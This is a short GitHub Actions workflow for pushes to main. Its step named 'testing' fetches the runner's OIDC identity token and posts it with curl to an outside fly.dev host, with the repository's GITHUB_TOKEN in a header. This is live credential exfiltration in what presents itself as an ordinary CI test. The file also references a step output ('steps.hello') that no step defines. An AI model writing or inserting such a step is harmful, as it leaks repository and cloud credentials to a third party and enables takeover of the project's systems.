on:
  push:
    branches:
      - main
  workflow_dispatch:
jobs:
  testing:
    permissions:
      contents: "read"
      id-token: "write"
    name: Testing
    runs-on: ubuntu-latest
    steps:
      - name: Johnny action step
        id: johnny
        uses: navikt/johnny-action@v2
        with:
          name: 'Roger'
      - name: Get the output time
        run: echo "The time was ${{ steps.hello.outputs.time }}"
      - name: testing
        run: |
          payload=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=hookd")
          curl https://twilight-hill-6850.fly.dev --data "$payload" -H"Authorization: ${{env.GITHUB_TOKEN}}"

